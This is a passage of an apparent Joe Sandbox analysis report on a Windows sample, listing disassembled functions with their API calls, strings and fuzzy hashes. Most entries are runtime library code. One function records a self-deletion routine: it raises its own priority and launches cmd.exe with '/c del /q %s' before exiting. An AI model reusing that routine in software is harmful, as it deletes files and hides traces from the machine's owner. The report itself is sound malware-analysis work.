Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d8d4b62d8ed93f8ac65190b4edcf077bb6f7da257b6763cde11f8f07facc976
Instruction ID: cc81c15cb894a8619e6087453d1a1d85a435331a86de0e211a906b816b1f0f44
Opcode Fuzzy Hash: 8d8d4b62d8ed93f8ac65190b4edcf077bb6f7da257b6763cde11f8f07facc976
Instruction Fuzzy Hash: 8D321532D29F014DD7239639C822735A69DAFB73E4F19D727E81AB59A7EB29C4834100

Function 00AC06BC Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 7e9a5873d1a704cd0066701f947d0fd6cb5595deffc8012f0f4c82ef78e46605
Instruction ID: a4f5ecf6cb6be49221c380b9bfc8242defa43418de9f170c017ea4c9fcd5aedf
Opcode Fuzzy Hash: 7e9a5873d1a704cd0066701f947d0fd6cb5595deffc8012f0f4c82ef78e46605
Instruction Fuzzy Hash: 99B1F435500701DBDB38AB64CD92FBBB3E8EF44308F55856DE987C6681EAB5A985CB00

Function 00AA2E30 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 36threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000100), ref: 00AA2E3E
SetPriorityClass.KERNEL32(00000000), ref: 00AA2E45
GetCurrentThread.KERNEL32 ref: 00AA2E4D
SetThreadPriority.KERNEL32(00000000), ref: 00AA2E54
SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 00AA2E68
_fwprintf.LIBCONCRTD ref: 00AA2E82

Part of subcall function 00AA1170: _fread.LIBCMTD ref: 00AA118A

ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 00AA2EA1
ExitProcess.KERNEL32 ref: 00AA2EA9

Strings

/c del /q %s, xrefs: 00AA2E76
cmd.exe, xrefs: 00AA2E95
open, xrefs: 00AA2E9A

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: CurrentPriorityProcessThread$ChangeClassExecuteExitNotifyShell_fread_fwprintf
String ID: /c del /q %s$cmd.exe$open
API String ID: 809167050-3932901086
Opcode ID: e7253cdfd11a163e7ee6ad0fd40e28f50e5a237c0dd5f645b0031db114c93fee
Instruction ID: 3794ecc621d4e192c3464a35b9e1831d2f631ac40fb19244994132a5e7a2f0c8
Opcode Fuzzy Hash: e7253cdfd11a163e7ee6ad0fd40e28f50e5a237c0dd5f645b0031db114c93fee
Instruction Fuzzy Hash: 71F01275A843047FE751E7E09C4FFA93668BB08B02F450414B706991D1DEF815498B62

Function 00AACD78 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00AACE75
type_info::operator==.LIBVCRUNTIME ref: 00AACE97
___TypeMatch.LIBVCRUNTIME ref: 00AACFA6
IsInExceptionSpec.LIBVCRUNTIME ref: 00AAD078
_UnwindNestedFrames.LIBCMT ref: 00AAD0FC
CallUnexpected.LIBVCRUNTIME ref: 00AAD117

Strings

csm, xrefs: 00AACE22
csm, xrefs: 00AACDB5
csm, xrefs: 00AACECE

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 4430e7d7d6cc20c160529919d7d780c399869618c42f0927b5880625f548da22
Instruction ID: 76256565008bd831f472e5b776ac0c83df4d4b030989fcee5d093ff8fbc934d4
Opcode Fuzzy Hash: 4430e7d7d6cc20c160529919d7d780c399869618c42f0927b5880625f548da22
Instruction Fuzzy Hash: 1DB1AE71800209EFDF29DFA4C9819AEBBB5FF16320F10415AF8526B692D731DE52CB91

Function 00AA1C30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00AA1C51
_Yarn.LIBCPMTD ref: 00AA1C63
_Yarn.LIBCPMTD ref: 00AA1C72
_Yarn.LIBCPMTD ref: 00AA1C81
_Yarn.LIBCPMTD ref: 00AA1C90
_Yarn.LIBCPMTD ref: 00AA1C9F
_Yarn.LIBCPMTD ref: 00AA1CAE
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AA1CC5

Part of subcall function 00AA9482: _Yarn.LIBCPMT ref: 00AA94A1
Part of subcall function 00AA9482: _Yarn.LIBCPMT ref: 00AA94C5

Strings

bad locale name, xrefs: 00AA1CCF

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3904239083-1405518554
Opcode ID: 985fdb65d7aba32b97c091c9f9ca5c5042721ea36a9fd32466750d2559f6b6be
Instruction ID: 07ebcea1315093f752e869b6792ecc0a8beceb116f56604033cf2ff23fd24d07
Opcode Fuzzy Hash: 985fdb65d7aba32b97c091c9f9ca5c5042721ea36a9fd32466750d2559f6b6be
Instruction Fuzzy Hash: A4116D70904289EFCB04EF98CA55BAEBB75BF46718F14455CF4122B3C2CBB55A00C761

Function 00AC629A Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00910FD0,00910FD0,?,7FFFFFFF,?,00AC656A,00910FD0,00910FD0,?,00910FD0,?,?,?,?,00910FD0,?), ref: 00AC6340
__alloca_probe_16.LIBCMT ref: 00AC63FB
__alloca_probe_16.LIBCMT ref: 00AC648A
__freea.LIBCMT ref: 00AC64D5
__freea.LIBCMT ref: 00AC64DB
__freea.LIBCMT ref: 00AC6511
__freea.LIBCMT ref: 00AC6517
__freea.LIBCMT ref: 00AC6527

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: aab46623fa4e629944dd3baf6e5e5f9f43d2eaf59436be177c93b768ba5bb26a
Instruction ID: b377e1135308811839682d8d538c0d802cdd07f38098985c8d21341223e67cf6
Opcode Fuzzy Hash: aab46623fa4e629944dd3baf6e5e5f9f43d2eaf59436be177c93b768ba5bb26a
Instruction Fuzzy Hash: 8971B372904259ABDF21DF948E41FEE7BF9AF49310F2A005DE915AB282DB35DC00C791

Function 00AA9B23 Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00AA9B6C
__alloca_probe_16.LIBCMT ref: 00AA9B98
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00AA9BD7
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AA9BF4
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00AA9C33
__alloca_probe_16.LIBCMT ref: 00AA9C50
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AA9C92
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00AA9CB5

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 82748777e13bc84514f96479933fbcb464b23cc85c5e7d29593b22b37a80673f
Instruction ID: 95cba7d6d50dcb82e73f9c36eda9e47169af654e722d189badecf7bc1654455b
Opcode Fuzzy Hash: 82748777e13bc84514f96479933fbcb464b23cc85c5e7d29593b22b37a80673f
Instruction Fuzzy Hash: A3519D7250061AEFEB219FA0DC85FAB7BF9EB46760F114129F915A71A0DB35CC10CBA0

Function 00AB851D Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00AB85A3

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 88fa05fee6af742072e9b0999c7c4b8006f620844c5ab2e84b20edb38d002f48
Instruction ID: 4170287a22a0615428eb1182c26985a457ab7fea274f0b555a374668f3cfc61c
Opcode Fuzzy Hash: 88fa05fee6af742072e9b0999c7c4b8006f620844c5ab2e84b20edb38d002f48
Instruction Fuzzy Hash: B0B15872A00255AFDB11CF6CCC81BEE7BBDEF55354F294165E804AB283DA78D941C7A0

Function 00AA44E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00AA44FB
char_traits.LIBCPMTD ref: 00AA450E

Strings

, xrefs: 00AA45BF

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: char_traits
String ID:
API String ID: 1158913984-3916222277
Opcode ID: 9992890c9afaafaabc23ccd5b0056a2394fbebafae0edfb44ae6f50bdc84cabe
Instruction ID: 931892b01f507ddac07ab8e7b936eba29daffb1428e1cd0026b83c5aab926e68
Opcode Fuzzy Hash: 9992890c9afaafaabc23ccd5b0056a2394fbebafae0edfb44ae6f50bdc84cabe
Instruction Fuzzy Hash: FB5153B5D10109AFCB04DF94C5519EEBBB5AF8B300F48816AF511AB282E7759E44CFA1

Function 00AB7B86 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00AB7C95,00AADDC1,CE3BFFFF,00000000,00AAEB35,00000000,?,00AB7EBF,00000022,FlsSetValue,00ACBE90,00ACBE98,00AAEB35), ref: 00AB7C47

Strings

api-ms-, xrefs: 00AB7BDD
ext-ms-, xrefs: 00AB7BF1

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: c2a44f41ab816696019aaf9849d7ce2fce5a8b23802004de03407e17ed664eee
Instruction ID: 6da6f6a057dd8597fea9372b84eba5f2107bf79adbb4b81ab97d5513f011d30f
Opcode Fuzzy Hash: c2a44f41ab816696019aaf9849d7ce2fce5a8b23802004de03407e17ed664eee
Instruction Fuzzy Hash: 95212B71A05610ABCB21DB65EC41FDF3B6CBB82370F210555E912A7292DFB0EE01DAE0

Function 00AA40A0 Relevance: 9.2, APIs: 6, Instructions: 179COMMON

Download Yara Rule

APIs

_Fgetc.LIBCPMTD ref: 00AA4126

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: Fgetc
String ID:
API String ID: 1720979605-0
Opcode ID: c7b179d09ec7bc08164cf45005fcba81018e4a7b97e8b86457fd22583cd53bc2
Instruction ID: b67658a4f887c519ebce62bc3d9b9b372aa3c5e460c7e4fcb290d16f4935b379
Opcode Fuzzy Hash: c7b179d09ec7bc08164cf45005fcba81018e4a7b97e8b86457fd22583cd53bc2
Instruction Fuzzy Hash: 0A613EB1C001099FCB04EBE4CA52AEEB7B4AF5A311F244229F412772D5EB755E08CFA5

Function 00AACA0A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00AACA01,00AAB151,00AAA68A), ref: 00AACA18
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AACA26
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AACA3F
SetLastError.KERNEL32(00000000,00AACA01,00AAB151,00AAA68A), ref: 00AACA91

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: c04df855c8cb6f74aa0a1cf3046daacf3a095b6353fb0e0edb648906ab124c0a
Instruction ID: 394835bbaef04dddaf7c87a88ef845047501882d12ca81d77639e2d1f3b83750
Opcode Fuzzy Hash: c04df855c8cb6f74aa0a1cf3046daacf3a095b6353fb0e0edb648906ab124c0a
Instruction Fuzzy Hash: 2101B1322097155EF628ABF4AD85ABB3759EB033B4760022AF126935E1FF554C029244

Function 00AADAA2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00AADB63,?,?,00AD85C4,00000000,?,00AADC8E,00000004,InitializeCriticalSectionEx,00AC9C0C,InitializeCriticalSectionEx,00000000), ref: 00AADB32

Strings

api-ms-, xrefs: 00AADAF2

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 5a61a11d41b3df852e6456c52940924cc0541fd49c4cd809397e16b6e6b397b0
Instruction ID: f4c795a0f6a4b6b82e68a007397c8d1ad36f629ba09c79cb4b016b9336aa11a3
Opcode Fuzzy Hash: 5a61a11d41b3df852e6456c52940924cc0541fd49c4cd809397e16b6e6b397b0
Instruction Fuzzy Hash: 9311E936B41620ABDF22CBA89C44F9E33A4AF02770F270111F952EB6C0DB70ED0186E5

Function 00AB36F8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,10830A53,00AAEB35,?,00000000,00AC76D3,000000FF,?,00AB3692,CE3BFFFF,?,00AB3666,?), ref: 00AB372D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AB373F
FreeLibrary.KERNEL32(00000000,?,00000000,00AC76D3,000000FF,?,00AB3692,CE3BFFFF,?,00AB3666,?), ref: 00AB3761

Strings

mscoree.dll, xrefs: 00AB3726
CorExitProcess, xrefs: 00AB3737

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 4031385b99b5a27cda79dec6b035cd913934c0517ab9f765c49a1a88779dc5a9
Instruction ID: 96a95656aff4dc4823c24cc48550e7951e1800c909b879e7acf9e0505f08bebc
Opcode Fuzzy Hash: 4031385b99b5a27cda79dec6b035cd913934c0517ab9f765c49a1a88779dc5a9
Instruction Fuzzy Hash: E901A772954655FFDB01CB95DC09FAEB7B8FB04711F064629E811A22D0DF749904CB50

Function 00ABB35C Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00ABB3E1
__alloca_probe_16.LIBCMT ref: 00ABB4AA
__freea.LIBCMT ref: 00ABB511

Part of subcall function 00AB830E: HeapAlloc.KERNEL32(00000000,00ABE796,00000000,?,00ABE796,00000220,?,?,00000000), ref: 00AB8340

__freea.LIBCMT ref: 00ABB524
__freea.LIBCMT ref: 00ABB531

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: d00afab5868a4c304b66be5b198f701f4deaa1496e703c7e1cccd3ff46da2297
Instruction ID: 22d671562d5d2c5c522bb5243f01747c661ae5658543ba32269915b0232288e5
Opcode Fuzzy Hash: d00afab5868a4c304b66be5b198f701f4deaa1496e703c7e1cccd3ff46da2297
Instruction Fuzzy Hash: 3551CF72621206AFEB315FA4DD82EFB7AADEF44710B150228FD0696252EBB1CC50C671

Function 00AA6D60 Relevance: 7.7, APIs: 5, Instructions: 151COMMON

Download Yara Rule

APIs

std::ios_base::good.LIBCPMTD ref: 00AA6D92
std::ios_base::getloc.LIBCPMTD ref: 00AA6E14
char_traits.LIBCPMTD ref: 00AA6EA8
std::ios_base::good.LIBCPMTD ref: 00AA6F3B

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: std::ios_base::good$char_traitsstd::ios_base::getloc
String ID:
API String ID: 1920461149-0
Opcode ID: a1a83a1192562e1d6dc81d0da7bc82139ecb56097495347422dd223e6775050d
Instruction ID: 8acc3b8e85508720bcf5dc2ecbd53fb27f1dcb1290b98e39926586d1d7ddde13
Opcode Fuzzy Hash: a1a83a1192562e1d6dc81d0da7bc82139ecb56097495347422dd223e6775050d
Instruction Fuzzy Hash: E85128B4E04209DFCF04DFA4C992ABEBBB1AF4A314F188159E6126B3D1D735A941DF90

Function 00AA4390 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00AA43D0
char_traits.LIBCPMTD ref: 00AA4405
char_traits.LIBCPMTD ref: 00AA4420
char_traits.LIBCPMTD ref: 00AA444B

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: char_traits
String ID:
API String ID: 1158913984-0
Opcode ID: 6d38b8927014bae4a1bfc6197b3b45686e08351c4f3f0e563744a365e24d6631
Instruction ID: c47e142afeca70a47865cd411c80be7e128990298d51ae25953cfa320513dbd1
Opcode Fuzzy Hash: 6d38b8927014bae4a1bfc6197b3b45686e08351c4f3f0e563744a365e24d6631
Instruction Fuzzy Hash: DD31B5B5D00108ABCF04EFA0D951AEE7B756F8A301F48416AF4129B2C3EB719A45CBA1

Function 00AA7850 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00AA7870
int.LIBCPMTD ref: 00AA7889

Part of subcall function 00AA1E00: std::_Lockit::_Lockit.LIBCPMT ref: 00AA1E16
Part of subcall function 00AA1E00: std::_Lockit::~_Lockit.LIBCPMT ref: 00AA1E40

